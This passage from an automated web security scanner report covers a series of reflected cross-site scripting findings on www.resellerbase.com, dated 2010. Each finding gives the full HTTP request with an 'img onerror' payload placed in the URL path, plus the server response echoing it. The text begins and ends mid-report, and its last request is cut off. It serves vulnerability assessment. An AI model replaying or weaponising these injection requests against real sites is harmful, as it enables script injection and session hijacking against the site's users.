GET /tag/themes1c692<img%20src%3da%20onerror%3dalert(1)>1c3cfaef56c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes1c692<img src=a onerror=alert(1)>1c3cfaef56c/kosmos/images/rating/search.php]</td>
...[SNIP]...

2.4523. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cdad0</title><img%20src%3da%20onerror%3dalert(1)>856068db0e1 was submitted in the REST URL parameter 2. This input was echoed as cdad0</title><img src=a onerror=alert(1)>856068db0e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themescdad0</title><img%20src%3da%20onerror%3dalert(1)>856068db0e1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themescdad0</title><img src=a onerror=alert(1)>856068db0e1/kosmos/images/rating/search.php</title>
...[SNIP]...

2.4524. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 98745</title><img%20src%3da%20onerror%3dalert(1)>40c87104ecf was submitted in the REST URL parameter 3. This input was echoed as 98745</title><img src=a onerror=alert(1)>40c87104ecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos98745</title><img%20src%3da%20onerror%3dalert(1)>40c87104ecf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos98745</title><img src=a onerror=alert(1)>40c87104ecf/images/rating/search.php</title>
...[SNIP]...

2.4525. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bbb5a</title><img%20src%3da%20onerror%3dalert(1)>a5413992da972fd5e was submitted in the REST URL parameter 3. This input was echoed as bbb5a</title><img src=a onerror=alert(1)>a5413992da972fd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosbbb5a</title><img%20src%3da%20onerror%3dalert(1)>a5413992da972fd5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbbb5a</title><img src=a onerror=alert(1)>a5413992da972fd5e/images/rating/search.php</title>
...[SNIP]...

2.4526. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d211<img%20src%3da%20onerror%3dalert(1)>2d6954f527c was submitted in the REST URL parameter 3. This input was echoed as 7d211<img src=a onerror=alert(1)>2d6954f527c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos7d211<img%20src%3da%20onerror%3dalert(1)>2d6954f527c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos7d211<img src=a onerror=alert(1)>2d6954f527c/images/rating/search.php]</td>
...[SNIP]...

2.4527. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4f78f<img%20src%3da%20onerror%3dalert(1)>f1efa78ff7ce46ef7 was submitted in the REST URL parameter 3. This input was echoed as 4f78f<img src=a onerror=alert(1)>f1efa78ff7ce46ef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos4f78f<img%20src%3da%20onerror%3dalert(1)>f1efa78ff7ce46ef7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos4f78f<img src=a onerror=alert(1)>f1efa78ff7ce46ef7/images/rating/search.php]</td>
...[SNIP]...

2.4528. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f495d<img%20src%3da%20onerror%3dalert(1)>336c2815c99b6610b was submitted in the REST URL parameter 4. This input was echoed as f495d<img src=a onerror=alert(1)>336c2815c99b6610b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesf495d<img%20src%3da%20onerror%3dalert(1)>336c2815c99b6610b/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesf495d<img src=a onerror=alert(1)>336c2815c99b6610b/rating/search.php]</td>
...[SNIP]...

2.4529. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f0bc1</title><img%20src%3da%20onerror%3dalert(1)>f63a3184c1ea17175 was submitted in the REST URL parameter 4. This input was echoed as f0bc1</title><img src=a onerror=alert(1)>f63a3184c1ea17175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesf0bc1</title><img%20src%3da%20onerror%3dalert(1)>f63a3184c1ea17175/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf0bc1</title><img src=a onerror=alert(1)>f63a3184c1ea17175/rating/search.php</title>
...[SNIP]...

2.4530. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f9a91</title><img%20src%3da%20onerror%3dalert(1)>6ecf719be24 was submitted in the REST URL parameter 4. This input was echoed as f9a91</title><img src=a onerror=alert(1)>6ecf719be24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesf9a91</title><img%20src%3da%20onerror%3dalert(1)>6ecf719be24/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf9a91</title><img src=a onerror=alert(1)>6ecf719be24/rating/search.php</title>
...[SNIP]...

2.4531. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85881<img%20src%3da%20onerror%3dalert(1)>c35bab690b2 was submitted in the REST URL parameter 4. This input was echoed as 85881<img src=a onerror=alert(1)>c35bab690b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images85881<img%20src%3da%20onerror%3dalert(1)>c35bab690b2/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images85881<img src=a onerror=alert(1)>c35bab690b2/rating/search.php]</td>
...[SNIP]...

2.4532. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2ae5b<img%20src%3da%20onerror%3dalert(1)>0641ad88061 was submitted in the REST URL parameter 5. This input was echoed as 2ae5b<img src=a onerror=alert(1)>0641ad88061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating2ae5b<img%20src%3da%20onerror%3dalert(1)>0641ad88061/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating2ae5b<img src=a onerror=alert(1)>0641ad88061/search.php]</td>
...[SNIP]...

2.4533. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 7aaed</title><img%20src%3da%20onerror%3dalert(1)>38e2a44d05b was submitted in the REST URL parameter 5. This input was echoed as 7aaed</title><img src=a onerror=alert(1)>38e2a44d05b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating7aaed</title><img%20src%3da%20onerror%3dalert(1)>38e2a44d05b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating7aaed</title><img src=a onerror=alert(1)>38e2a44d05b/search.php</title>
...[SNIP]...

2.4534. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57aeb<img%20src%3da%20onerror%3dalert(1)>18aa90bc97f6605b2 was submitted in the REST URL parameter 5. This input was echoed as 57aeb<img src=a onerror=alert(1)>18aa90bc97f6605b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating57aeb<img%20src%3da%20onerror%3dalert(1)>18aa90bc97f6605b2/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating57aeb<img src=a onerror=alert(1)>18aa90bc97f6605b2/search.php]</td>
...[SNIP]...

2.4535. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload cdc59</title><img%20src%3da%20onerror%3dalert(1)>74c11e852798f9597 was submitted in the REST URL parameter 5. This input was echoed as cdc59</title><img src=a onerror=alert(1)>74c11e852798f9597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/ratingcdc59</title><img%20src%3da%20onerror%3dalert(1)>74c11e852798f9597/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingcdc59</title><img src=a onerror=alert(1)>74c11e852798f9597/search.php</title>
...[SNIP]...

2.4536. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8856c<img%20src%3da%20onerror%3dalert(1)>5ef148c5f47 was submitted in the REST URL parameter 6. This input was echoed as 8856c<img src=a onerror=alert(1)>5ef148c5f47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php8856c<img%20src%3da%20onerror%3dalert(1)>5ef148c5f47?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.php8856c<img src=a onerror=alert(1)>5ef148c5f47]</td>
...[SNIP]...

2.4537. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3569<img%20src%3da%20onerror%3dalert(1)>ad4eca3e1adb7c49c was submitted in the REST URL parameter 6. This input was echoed as c3569<img src=a onerror=alert(1)>ad4eca3e1adb7c49c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating/search.phpc3569<img%20src%3da%20onerror%3dalert(1)>ad4eca3e1adb7c49c?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
